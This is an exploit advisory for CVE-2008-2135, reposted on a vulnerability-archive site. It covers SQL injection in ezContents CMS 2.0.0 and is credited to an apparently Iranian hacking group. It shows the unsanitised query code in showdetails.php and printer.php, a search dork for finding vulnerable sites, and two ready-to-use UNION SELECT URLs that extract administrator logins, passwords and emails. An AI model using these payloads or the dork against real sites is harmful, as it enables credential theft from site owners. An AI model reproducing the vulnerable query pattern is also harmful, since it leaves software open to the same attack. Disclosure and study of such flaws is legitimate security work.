Bug: ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities ( Ascii Version )

Search:
WLB2

ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities

Published
Credit
Risk
2008.05.10
Virangar Security Team
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-2135
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial


########################################################################
###############

# #

# ...:::::ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities ::::... #

########################################################################
###############

Virangar Security Team

www.virangar.net

--------

Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----

d0rk:"ezContents CMS Version 2.0.0"

-------vuln codes in:-----------

showdetails.php:

$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname
='".$HTTP_GET_VARS["contentname"]."' AND
language='".$GLOBALS["gsLanguage"]."'";

*********

printer.php:

$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname
='".$HTTP_GET_VARS["article"]."' AND
language='".$GLOBALS["gsLanguage"]."'";

---

exploits:

http://site.com/[patch]/showdetails.php?contentname='/**/union/**/select
/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/fro
m/**/authors/**/where/**/authorid=1/*

http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,
3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,c
oncat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/aut
hors/**/where/**/authorid=1/*

---

young iranian h4ck3rz

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version